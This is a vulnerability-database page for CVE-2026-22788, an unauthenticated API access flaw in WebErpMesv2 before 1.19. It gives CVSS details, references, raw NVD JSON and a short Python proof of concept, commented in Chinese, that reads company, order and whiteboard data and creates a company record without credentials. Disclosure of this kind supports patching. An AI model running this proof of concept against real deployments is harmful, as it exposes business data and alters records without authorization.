CVE-2026-22788

Description

WebErpMesv2 is a Resource Management and Manufacturing execution system Web for industry. Prior to 1.19, the WebErpMesV2 application exposes multiple sensitive API endpoints without authentication middleware. An unauthenticated remote attacker can read business-critical data including companies, quotes, orders, tasks, and whiteboards. Limited write access allows creation of company records and full manipulation of collaboration whiteboards. This vulnerability is fixed in 1.19.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wem-project:wem:*:*:*:*:*:*:*:* - VULNERABLE

WebErpMesv2 < 1.19

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-22788 PoC - WebErpMesv2 Unauthenticated Access
# Target: WebErpMesv2 < 1.19

target = "http://target.com"  # 替换为目标URL

# 未授权访问公司信息API端点
companies_endpoint = f"{target}/api/companies"
response = requests.get(companies_endpoint)
print(f"公司信息响应状态码: {response.status_code}")
print(f"公司信息: {response.text}")

# 未授权访问订单API端点
orders_endpoint = f"{target}/api/orders"
response = requests.get(orders_endpoint)
print(f"订单信息响应状态码: {response.status_code}")
print(f"订单信息: {response.text}")

# 未授权访问白板API端点
whiteboard_endpoint = f"{target}/api/whiteboard"
response = requests.get(whiteboard_endpoint)
print(f"白板信息响应状态码: {response.status_code}")
print(f"白板信息: {response.text}")

# 尝试写入操作 - 创建公司记录
create_company = f"{target}/api/companies"
company_data = {"name": "Test Company", "description": "Created via PoC"}
response = requests.post(create_company, json=company_data)
print(f"创建公司响应状态码: {response.status_code}")
print(f"创建结果: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22788
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22788
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22788/
[4] VulDB https://vuldb.com/cve/CVE-2026-22788
[5] https://github.com/SMEWebify/WebErpMesv2/commit/3a7ab1c95d1d1c8f7c62c84bc87b3666ecd2fa23
[6] https://github.com/SMEWebify/WebErpMesv2/security/advisories/GHSA-pp68-5pc2-hv7w
[7] https://github.com/SMEWebify/WebErpMesv2/security/advisories/GHSA-pp68-5pc2-hv7w

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22788", "sourceIdentifier": "[email protected]", "published": "2026-01-12T22:16:08.343", "lastModified": "2026-01-21T19:11:14.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebErpMesv2 is a Resource Management and Manufacturing execution system Web for industry. Prior to 1.19, the WebErpMesV2 application exposes multiple sensitive API endpoints without authentication middleware. An unauthenticated remote attacker can read business-critical data including companies, quotes, orders, tasks, and whiteboards. Limited write access allows creation of company records and full manipulation of collaboration whiteboards. This vulnerability is fixed in 1.19."}, {"lang": "es", "value": "WebErpMesv2 es un sistema web de gestión de recursos y ejecución de fabricación para la industria. Antes de la 1.19, la aplicación WebErpMesV2 expone múltiples puntos finales de API sensibles sin middleware de autenticación. Un atacante remoto no autenticado puede leer datos críticos para el negocio, incluyendo empresas, cotizaciones, pedidos, tareas y pizarras. Acceso de escritura limitado permite la creación de registros de empresas y la manipulación completa de pizarras de colaboración. Esta vulnerabilidad está corregida en la 1.19."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wem-project:wem:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.19", "matchCriteriaId": "B8FFED4C-1ACD-4922-99EB-4951BD1C6B8E"}]}]}], "references": [{"url": "https://github.com/SMEWebify/WebErpMesv2/commit/3a7ab1c95d1d1c8f7c62c84bc87b3666ecd2fa23", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/SMEWebify/WebErpMesv2/security/advisories/GHSA-pp68-5pc2-hv7w", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/SMEWebify/WebErpMesv2/security/advisories/GHSA-pp68-5pc2-hv7w", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}